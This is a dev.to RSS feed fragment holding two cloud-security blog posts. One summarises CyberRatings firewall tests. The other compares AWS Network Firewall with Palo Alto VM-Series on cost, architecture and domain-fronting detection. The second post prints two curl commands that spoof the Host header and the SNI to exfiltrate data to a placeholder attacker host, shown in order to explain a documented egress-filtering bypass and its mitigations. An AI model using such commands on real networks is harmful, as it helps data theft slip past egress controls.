&lt;strong&gt;SCPs&lt;/strong&gt; to prevent misconfigurations at the organizational level&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. If you need a true IPS system, deploy an external NGFW
&lt;/h3&gt;

&lt;p&gt;For regulated industries (PCI-DSS, HIPAA, SOX), environments processing sensitive data, or organizations with active threat models involving targeted attacks, consider deploying an external NGFW on AWS. Check Point, Fortinet, Juniper, Palo Alto, and Versa all achieved scores of 99.61-100% in the same test, running on the same AWS infrastructure.&lt;/p&gt;

&lt;p&gt;Interestingly, this doesn't mean you have to abandon NFW. I've actually seen many environments using both solutions. NFW for broad traffic filtering and an external NGFW provider in a centralized VPC for in-depth inspection.&lt;/p&gt;

&lt;h2&gt;
  
  
  The real question no one asks
&lt;/h2&gt;

&lt;p&gt;The CyberRatings test measures how well a firewall detects known exploits and resists evasion techniques. That matters. But it's not the whole picture.&lt;/p&gt;

&lt;p&gt;Most AWS security incidents I've seen weren't caused by an attacker exploiting a CVE through the firewall. They were caused by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Overly permissive IAM policies&lt;/li&gt;
&lt;li&gt;S3 buckets with public access&lt;/li&gt;
&lt;li&gt;Security groups open to everyone&lt;/li&gt;
&lt;li&gt;Access keys that haven't been rotated in 900 days&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;a href="https://haitmg.pl/blog/aws-security-audit-checklist/" rel="noopener noreferrer"&gt;17 checks I perform during every AWS audit&lt;/a&gt; reveal more real risk than any firewall result. A team that fixes these fundamental issues and runs AWS NFW with TLS inspection is more secure than a team that deploys Palo Alto VM-Series but leaves its root account without MFA.&lt;/p&gt;

&lt;p&gt;Security is a matter of layers. Firewalls are one layer. Don't let the test result make you forget about the others.&lt;/p&gt;




&lt;h3&gt;
  
  
  Sources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-publishes-test-results-on-cloud-network-firewalls/" rel="noopener noreferrer"&gt;"Q1 2025 Cloud Network Firewall Test Results"&lt;/a&gt;, April 2025&lt;/li&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-network-firewall/" rel="noopener noreferrer"&gt;"Cloud Network Firewall Comparative Test"&lt;/a&gt;, April 2024&lt;/li&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-service-provider-native-firewalls/" rel="noopener noreferrer"&gt;"CSP Native Firewall Test Results"&lt;/a&gt;, November 2024&lt;/li&gt;
&lt;li&gt;CyberScoop, &lt;a href="https://cyberscoop.com/independent-tests-show-why-orgs-should-use-third-party-cloud-security-services/" rel="noopener noreferrer"&gt;"Independent tests show why orgs should use third-party cloud security services"&lt;/a&gt;, April 2025&lt;/li&gt;
&lt;li&gt;SDxCentral, &lt;a href="https://www.sdxcentral.com/analysis/hyperscaler-cloud-firewalls-again-fail-to-meet-basic-security-standards/" rel="noopener noreferrer"&gt;"Hyperscaler Cloud Firewalls Again Fail to Meet Basic Security Standards"&lt;/a&gt;, April 2025&lt;/li&gt;
&lt;li&gt;SDxCentral, &lt;a href="https://www.sdxcentral.com/analysis/is-the-aws-network-firewall-safe-cyberratings-tests-reveal-concerns/" rel="noopener noreferrer"&gt;"Is the AWS Network Firewall Safe?"&lt;/a&gt;, May 2024&lt;/li&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-and-nss-labs-announce-follow-on-enterprise-firewall-results/" rel="noopener noreferrer"&gt;"Follow-On Enterprise Firewall Results"&lt;/a&gt;, 2025&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/suricata-limitations-caveats.html" rel="noopener noreferrer"&gt;"Suricata Limitations"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/firewall-rules-engines.html" rel="noopener noreferrer"&gt;"Firewall Rules Engines"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;"TLS Inspection Considerations"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS, &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;"Network Firewall Pricing"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS, &lt;a href="https://aws.amazon.com/about-aws/whats-new/2026/02/aws-network-firewall-new-price-reduction/" rel="noopener noreferrer"&gt;"Network Firewall Price Reduction"&lt;/a&gt;, February 2026&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://www.paloaltonetworks.com/technologies/app-id" rel="noopener noreferrer"&gt;"App-ID Technology"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Dark Reading, &lt;a href="https://www.darkreading.com/endpoint-security/nss-labs-admits-its-test-of-crowdstrike-falcon-was-inaccurate-" rel="noopener noreferrer"&gt;"NSS Labs Admits Falcon Test Inaccurate"&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/aws-network-firewall-security-test-results/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;. Running AWS Network Firewall and want to understand your actual security posture? I audit cloud infrastructure for a living - from firewall rules to IAM policies to network architecture. &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>cloud</category>
      <category>devops</category>
    </item>
    <item>
      <title>AWS Network Firewall vs Palo Alto VM-Series - what I learned after deploying both in production</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Fri, 06 Mar 2026 09:42:49 +0000</pubDate>
      <link>https://dev.to/haitmg/aws-network-firewall-vs-palo-alto-vm-series-what-i-learned-after-deploying-both-in-production-56c8</link>
      <guid>https://dev.to/haitmg/aws-network-firewall-vs-palo-alto-vm-series-what-i-learned-after-deploying-both-in-production-56c8</guid>
      <description>&lt;p&gt;I've deployed both AWS Network Firewall and Palo Alto VM-Series firewalls in production AWS environments. These were Security VPC architectures for enterprise clients across the automotive, government, and cultural sectors - some built on AWS Network Firewall, others on Palo Alto VM-Series behind a Gateway Load Balancer.&lt;/p&gt;

&lt;p&gt;This is not a feature matrix from a vendor website. This is what I found after running both, what surprised me, and what you should know before choosing.&lt;/p&gt;

&lt;h2&gt;
  
  
  The short version
&lt;/h2&gt;

&lt;p&gt;AWS Network Firewall is good enough for most workloads. It's native, managed, and cheap to start with. But it has a &lt;strong&gt;documented egress filtering bypass&lt;/strong&gt; that lets an attacker circumvent your domain allowlist with a single curl command. If you're in a regulated industry or handle sensitive data, you need to understand this before committing.&lt;/p&gt;

&lt;p&gt;Palo Alto VM-Series catches things AWS Network Firewall doesn't - but you pay for it in complexity, cost, and operational overhead. It's not a slam dunk either.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where AWS Network Firewall works well
&lt;/h2&gt;

&lt;p&gt;Let's start with what AWS gets right, because it gets a lot right.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero infrastructure to manage.&lt;/strong&gt; No EC2 instances, no patching, no sizing. You create a firewall, attach it to a VPC, and it works. It scales automatically - there's no capacity planning conversation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Native integration.&lt;/strong&gt; Route tables, VPC, Transit Gateway - everything is first-party. No Gateway Load Balancer gymnastics, no GENEVE tunnels to debug. AWS Firewall Manager lets you deploy policies across an entire AWS Organization from a single place.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Suricata under the hood.&lt;/strong&gt; The stateful engine runs Suricata rules, which means you can use any compatible threat intelligence feed. If your team already knows Suricata, the learning curve is minimal.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost for basic use cases.&lt;/strong&gt; At &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;$0.395/hour per endpoint plus $0.065/GB processed&lt;/a&gt;, it's cheaper than VM-Series for low-to-medium traffic volumes. No license fees, no subscriptions.&lt;/p&gt;

&lt;p&gt;For a startup running a few services in a single VPC, or an internal application with basic egress filtering, AWS Network Firewall is perfectly adequate.&lt;/p&gt;

&lt;h2&gt;
  
  
  The egress filtering bypass that changes the conversation
&lt;/h2&gt;

&lt;p&gt;Here's where things get interesting. In September 2023, security researcher Jianjun Huo &lt;a href="https://canglad.com/post/2023/aws-network-firewall-egress-filtering-can-be-easily-bypassed/" rel="noopener noreferrer"&gt;documented a bypass&lt;/a&gt; in AWS Network Firewall's domain-based egress filtering. The vulnerability was also cataloged on &lt;a href="https://hackingthe.cloud/aws/post_exploitation/network-firewall-egress-filtering-bypass/" rel="noopener noreferrer"&gt;Hacking the Cloud&lt;/a&gt;, a well-known AWS security research resource.&lt;/p&gt;

&lt;h3&gt;
  
  
  How it works
&lt;/h3&gt;

&lt;p&gt;AWS Network Firewall uses the Server Name Indication (SNI) extension in TLS handshakes to determine which domain a client is connecting to. When you create a domain allowlist - say, only permit traffic to &lt;code&gt;*.amazonaws.com&lt;/code&gt; and &lt;code&gt;updates.example.com&lt;/code&gt; - the firewall checks the SNI field against your list.&lt;/p&gt;

&lt;p&gt;The problem: &lt;strong&gt;the firewall does not verify that the destination IP address actually belongs to the domain declared in the SNI.&lt;/strong&gt; AWS documentation explicitly states this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"Network Firewall doesn't pause connections to do out-of-band DNS lookups."&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;AWS Network Firewall documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;This means an attacker (or malware) inside your VPC can do this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# HTTP bypass - spoof the Host header&lt;/span&gt;
curl &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Host: updates.example.com"&lt;/span&gt; http://attacker-controlled-ip.com/exfiltrate

&lt;span class="c"&gt;# HTTPS bypass - spoof the SNI&lt;/span&gt;
curl &lt;span class="nt"&gt;--resolve&lt;/span&gt; &lt;span class="s2"&gt;"updates.example.com:443:attacker-ip"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
     https://updates.example.com/exfiltrate &lt;span class="nt"&gt;--insecure&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The firewall sees &lt;code&gt;updates.example.com&lt;/code&gt; in the SNI, checks it against the allowlist, and lets the traffic through. The actual TCP connection goes to the attacker's IP. Data exfiltrated. Allowlist bypassed.&lt;/p&gt;
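&lt;p&gt;To make the gap concrete, here is a toy model in Python. It is not how Network Firewall is implemented; the function names, the &lt;code&gt;known_ips&lt;/code&gt; table, and the documentation-range IP addresses are assumptions made for illustration. The first check looks only at the declared name, the second also asks whether the destination address is one the defender has recorded for that name.&lt;/p&gt;

```python
from fnmatch import fnmatch

# Hypothetical allowlist, mirroring the example domains used above.
ALLOWLIST = ["*.amazonaws.com", "updates.example.com"]


def sni_allowed(sni):
    """SNI-only check: the destination IP is never consulted."""
    return any(fnmatch(sni.lower(), pattern) for pattern in ALLOWLIST)


def sni_and_ip_allowed(sni, dest_ip, known_ips):
    """Stricter check: the name must be allowed AND the destination IP must be
    one recorded for that name. known_ips is an assumed lookup table, for
    example filled from the defender's own DNS resolution."""
    return sni_allowed(sni) and dest_ip in known_ips.get(sni.lower(), set())


# Spoofed connection: an allowed name in the SNI, an attacker address as target.
spoofed = {"sni": "updates.example.com", "dest_ip": "203.0.113.10"}
known = {"updates.example.com": {"198.51.100.7"}}

print(sni_allowed(spoofed["sni"]))                                    # True
print(sni_and_ip_allowed(spoofed["sni"], spoofed["dest_ip"], known))  # False
```

&lt;p&gt;The spoofed connection passes the name-only check and fails as soon as the destination address is taken into account, which is the whole bypass in two lines.&lt;/p&gt;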

&lt;p&gt;This is not a theoretical attack. It's a &lt;a href="https://hackingthe.cloud/aws/post_exploitation/network-firewall-egress-filtering-bypass/" rel="noopener noreferrer"&gt;documented technique used in post-exploitation scenarios&lt;/a&gt;, and it's closely related to &lt;a href="https://attack.mitre.org/techniques/T1090/004/" rel="noopener noreferrer"&gt;domain fronting&lt;/a&gt; - a technique cataloged in the MITRE ATT&amp;amp;CK framework under T1090.004.&lt;/p&gt;

&lt;h3&gt;
  
  
  The mitigation - and its gaps
&lt;/h3&gt;

&lt;p&gt;AWS added TLS inspection to Network Firewall, and &lt;a href="https://repost.aws/questions/QUGi6L4x4nRsCYc_FJ9aQkiQ/prevent-aws-network-firewall-host-header-spoofing" rel="noopener noreferrer"&gt;as of early 2025, enabling TLS inspection blocks SNI spoofing by default&lt;/a&gt;. When TLS inspection is active, the firewall validates that the server certificate's domain matches the SNI in the client hello. If they don't match, the connection is dropped.&lt;/p&gt;

&lt;p&gt;This is good. But it comes with significant caveats:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. TLS 1.3 Encrypted Client Hello (ECH) and Encrypted SNI (ESNI) are not supported.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;From the &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;official AWS documentation&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"Traffic encrypted using TLS v1.3 Encrypted SNI and Encrypted Client Hello extensions aren't supported."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When Network Firewall encounters a client hello without a visible SNI (because it's encrypted), it closes the connection with a RST packet. So you get security - but at the cost of breaking legitimate traffic that uses ECH. As ECH adoption grows (and it is growing - &lt;a href="https://www.enea.com/insights/tls-1-3-ech-how-to-preserve-critical-traffic-visibility-for-enterprise-and-network-security-while-safeguarding-privacy/" rel="noopener noreferrer"&gt;major browsers and CDN providers are rolling it out&lt;/a&gt;), this becomes a bigger compatibility problem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. QUIC (UDP-based transport) is not inspectable.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HTTP/3 runs over QUIC. AWS Network Firewall &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;cannot inspect QUIC traffic&lt;/a&gt;. The recommended workaround? Block UDP/443 entirely and force applications back to TCP. That works, but it's a blunt instrument.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. TLS inspection adds cost and complexity.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Enabling TLS inspection bumps the endpoint cost from $0.395/hour to &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;$0.489/hour&lt;/a&gt;. You also need to deploy and manage CA certificates on every host that sends traffic through the firewall - or accept that you're only inspecting a subset of your traffic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Existing connections are dropped when you enable TLS inspection.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Adding TLS inspection to a running firewall &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;interrupts existing traffic flows&lt;/a&gt;. This means you can't just flip it on during business hours.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Palo Alto handles the same scenario
&lt;/h2&gt;

&lt;p&gt;Palo Alto VM-Series approaches this differently at a fundamental level.&lt;/p&gt;

&lt;h3&gt;
  
  
  App-ID vs port-based filtering
&lt;/h3&gt;

&lt;p&gt;AWS Network Firewall classifies traffic by port, protocol, and domain (via SNI/Host header). &lt;a href="https://www.paloguard.com/app-id.asp" rel="noopener noreferrer"&gt;Palo Alto's App-ID classifies traffic by application identity&lt;/a&gt;, regardless of port. It inspects packet payloads, analyzes behavioral patterns, and matches traffic against a library of thousands of application signatures.&lt;/p&gt;

&lt;p&gt;This means App-ID can tell the difference between "legitimate HTTPS to aws.amazon.com" and "reverse shell tunneled over port 443 pretending to be HTTPS to aws.amazon.com." Port 443 is port 443 to AWS Network Firewall. To Palo Alto, they're two completely different applications.&lt;/p&gt;

&lt;h3&gt;
  
  
  Built-in domain fronting detection
&lt;/h3&gt;

&lt;p&gt;Starting with &lt;a href="https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-new-features/content-inspection-features/domain-fronting-detection" rel="noopener noreferrer"&gt;PAN-OS 10.2&lt;/a&gt;, Palo Alto firewalls with Threat Prevention or Advanced Threat Prevention can detect domain fronting attempts. When the domain in the SNI field differs from the HTTP Host header, the firewall generates a threat log entry with &lt;strong&gt;threat ID 86467&lt;/strong&gt; (classified as a Spyware signature).&lt;/p&gt;

&lt;p&gt;This is exactly the attack that bypasses AWS Network Firewall's domain filtering.&lt;/p&gt;

&lt;p&gt;The detection works because Palo Alto &lt;a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClVSCA0" rel="noopener noreferrer"&gt;inspects both the certificate's Common Name / Subject Alternative Name fields AND the SNI&lt;/a&gt;, and can automatically deny sessions where they don't match. AWS Network Firewall only gained similar capability through TLS inspection - and as noted above, with limitations.&lt;/p&gt;
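&lt;p&gt;The certificate-versus-SNI comparison described above can be sketched in a few lines of Python. This is a simplified illustration, not PAN-OS or AWS code: the function names are hypothetical, and the wildcard rule (a leading &lt;code&gt;*.&lt;/code&gt; matches exactly one left-most label) is a reduced version of what real TLS libraries do.&lt;/p&gt;

```python
def name_matches(pattern, hostname):
    """Compare one certificate name against a hostname.
    A leading '*.' matches exactly one left-most label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        head, sep, tail = hostname.partition(".")
        return bool(head) and sep == "." and tail == pattern[2:]
    return pattern == hostname


def cert_covers_sni(sni, cert_names):
    """True if any name presented in the server certificate covers the SNI."""
    return any(name_matches(name, sni) for name in cert_names)


# Genuine server: the certificate lists the name the client asked for.
print(cert_covers_sni("updates.example.com", ["updates.example.com"]))  # True

# Spoofed SNI: the attacker's server presents a certificate for another name.
print(cert_covers_sni("updates.example.com", ["attacker.example.net"]))  # False
```

&lt;p&gt;A session whose certificate names do not cover the declared SNI is the mismatch case that gets denied.&lt;/p&gt;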

&lt;h3&gt;
  
  
  What Palo Alto doesn't solve
&lt;/h3&gt;

&lt;p&gt;I'm not going to pretend VM-Series is perfect. Here's what you're signing up for:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You manage EC2 instances.&lt;/strong&gt; VM-Series runs on EC2. You're responsible for instance sizing, patching PAN-OS, HA configuration, and monitoring. When Palo Alto releases a critical security update (and &lt;a href="https://security.paloaltonetworks.com/CVE-2024-9468" rel="noopener noreferrer"&gt;they do&lt;/a&gt; - CVE-2024-9468 was a DoS vulnerability in the threat prevention engine), you're the one applying it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gateway Load Balancer complexity.&lt;/strong&gt; The recommended production architecture uses a &lt;a href="https://docs.paloaltonetworks.com/vm-series/10-2/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/vm-series-integration-with-gateway-load-balancer" rel="noopener noreferrer"&gt;centralized Security VPC with a Gateway Load Balancer&lt;/a&gt; distributing traffic across VM-Series instances. This means GENEVE encapsulation, appliance mode on Transit Gateway attachments, &lt;a href="https://www.paloaltonetworks.com/blog/network-security/vm-series-integration-with-aws-gateway-loadbalancer/" rel="noopener noreferrer"&gt;four separate subnets per AZ in the Security VPC&lt;/a&gt; (management, data, TGW, public), and careful route table configuration. It works beautifully when set up correctly. Getting there is not trivial.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost.&lt;/strong&gt; A VM-Series PAYG instance on the &lt;a href="https://aws.amazon.com/marketplace/pp/prodview-3xtziatyes54i" rel="noopener noreferrer"&gt;AWS Marketplace starts at $1.71/hour&lt;/a&gt; for a c5n.xlarge (the recommended instance type). That's the &lt;em&gt;software license alone&lt;/em&gt; - add the EC2 instance cost on top. For HA (which you want in production), double it. For multi-AZ, multiply again.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domain fronting detection requires SSL Decryption.&lt;/strong&gt; Threat ID 86467 &lt;a href="https://live.paloaltonetworks.com/t5/advanced-threat-prevention/how-to-detect-domain-fronting/td-p/253882" rel="noopener noreferrer"&gt;only works when the traffic is decrypted&lt;/a&gt; - either through SSL Forward Proxy or SSL Inbound Inspection. Without decryption, the firewall can't see the HTTP Host header to compare it against the SNI. By default, the signature action is &lt;code&gt;allow&lt;/code&gt; with &lt;code&gt;informational&lt;/code&gt; severity - you need to explicitly create a threat exception to block it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The cost math
&lt;/h2&gt;

&lt;p&gt;Let's compare a realistic production scenario: a centralized Security VPC in eu-central-1, two AZs, processing 500 GB of traffic per month.&lt;/p&gt;

&lt;h3&gt;
  
  
  AWS Network Firewall (with TLS inspection)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Monthly cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2 firewall endpoints x $0.489/h x 730h&lt;/td&gt;
&lt;td&gt;$714&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;500 GB x $0.065/GB&lt;/td&gt;
&lt;td&gt;$33&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$747/month&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Palo Alto VM-Series (PAYG, HA pair)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Monthly cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2 x VM-Series license x $1.71/h x 730h&lt;/td&gt;
&lt;td&gt;$2,497&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2 x c5n.xlarge EC2 x ~$0.34/h x 730h&lt;/td&gt;
&lt;td&gt;$496&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gateway Load Balancer x $0.0125/h x 730h&lt;/td&gt;
&lt;td&gt;$9&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLB data x $0.004/GB x 500 GB&lt;/td&gt;
&lt;td&gt;$2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$3,004/month&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That's a &lt;strong&gt;4x cost difference&lt;/strong&gt;. For some organizations, the additional security capabilities justify this. For others, they absolutely don't.&lt;/p&gt;
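&lt;p&gt;If you want to rerun the comparison with your own traffic volume, the arithmetic behind both tables fits in a short Python script. The rates are the ones quoted above; the variable names are mine, and the script assumes the same 730-hour month and two-AZ layout.&lt;/p&gt;

```python
HOURS_PER_MONTH = 730
TRAFFIC_GB = 500  # change this to model your own monthly volume

# AWS Network Firewall with TLS inspection: two endpoints plus data processing.
nfw_endpoints = 2 * 0.489 * HOURS_PER_MONTH
nfw_data = TRAFFIC_GB * 0.065
nfw_total = nfw_endpoints + nfw_data

# Palo Alto VM-Series PAYG pair: license, EC2, and Gateway Load Balancer.
vm_license = 2 * 1.71 * HOURS_PER_MONTH
vm_ec2 = 2 * 0.34 * HOURS_PER_MONTH
gwlb_hourly = 0.0125 * HOURS_PER_MONTH
gwlb_data = 0.004 * TRAFFIC_GB
vm_total = vm_license + vm_ec2 + gwlb_hourly + gwlb_data

print(f"AWS Network Firewall: ${nfw_total:,.2f}/month")
print(f"Palo Alto VM-Series:  ${vm_total:,.2f}/month")
print(f"Ratio: {vm_total / nfw_total:.1f}x")
```

&lt;p&gt;The unrounded totals land within a dollar of the table figures, because the tables add up line items that were already rounded.&lt;/p&gt;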

&lt;p&gt;The breakeven conversation is not about GB processed - it's about &lt;strong&gt;what a security incident would cost you&lt;/strong&gt;. If you're a fintech handling payment data, $3,000/month for a firewall that can actually detect domain fronting is cheap. If you're running internal dev tooling, AWS Network Firewall with TLS inspection is plenty.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to use which
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Recommendation&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Internal workloads, basic egress filtering&lt;/td&gt;
&lt;td&gt;AWS Network Firewall&lt;/td&gt;
&lt;td&gt;Simple, cheap, managed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-VPC with centralized inspection&lt;/td&gt;
&lt;td&gt;Either - depends on budget&lt;/td&gt;
&lt;td&gt;Both support Transit Gateway architectures&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PCI-DSS, HIPAA, SOX compliance&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;App-ID, granular logging, proven compliance track record&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid cloud (AWS + on-prem)&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;Same policies, same Panorama management plane&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain fronting / C2 detection required&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;Built-in detection (Threat ID 86467)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Budget under $1,000/month for firewall&lt;/td&gt;
&lt;td&gt;AWS Network Firewall&lt;/td&gt;
&lt;td&gt;VM-Series can't compete on price&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Team without Palo Alto expertise&lt;/td&gt;
&lt;td&gt;AWS Network Firewall + TLS inspection&lt;/td&gt;
&lt;td&gt;VM-Series has a learning curve&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Existing Palo Alto on-prem investment&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;Reuse policies, skills, and Panorama&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What I actually recommend to clients
&lt;/h2&gt;

&lt;p&gt;I don't tell every client to deploy Palo Alto. That would be irresponsible.&lt;/p&gt;

&lt;p&gt;For most startups and SMBs I work with, I recommend &lt;strong&gt;AWS Network Firewall with TLS inspection enabled from day one&lt;/strong&gt;. It covers 90% of use cases, costs a fraction of VM-Series, and doesn't require specialized Palo Alto expertise to maintain.&lt;/p&gt;

&lt;p&gt;But I always make sure they understand what it doesn't catch. I walk them through the SNI bypass scenario. I explain the ECH/QUIC gaps. And if they're in a regulated industry, or if they've had a security incident involving data exfiltration, or if they already run Palo Alto on-premises - then we talk about VM-Series and the centralized Security VPC architecture with Gateway Load Balancer.&lt;/p&gt;

&lt;p&gt;The worst outcome is deploying AWS Network Firewall with a domain allowlist and believing you're protected against data exfiltration. You're not. You're protected against accidental connections to the wrong domain. A determined attacker will walk right through it without TLS inspection - and even with TLS inspection, there are gaps.&lt;/p&gt;

&lt;p&gt;Security architecture is about understanding what your controls actually stop, and what they don't.&lt;/p&gt;




&lt;h3&gt;
  
  
  Sources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Jianjun Huo, &lt;a href="https://canglad.com/post/2023/aws-network-firewall-egress-filtering-can-be-easily-bypassed/" rel="noopener noreferrer"&gt;"AWS Network Firewall egress filtering can be easily bypassed"&lt;/a&gt;, September 2023 (updated February 2025)&lt;/li&gt;
&lt;li&gt;Hacking the Cloud, &lt;a href="https://hackingthe.cloud/aws/post_exploitation/network-firewall-egress-filtering-bypass/" rel="noopener noreferrer"&gt;"AWS Network Firewall Egress Filtering Bypass"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;"TLS inspection considerations"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS, &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;"Network Firewall Pricing"&lt;/a&gt;
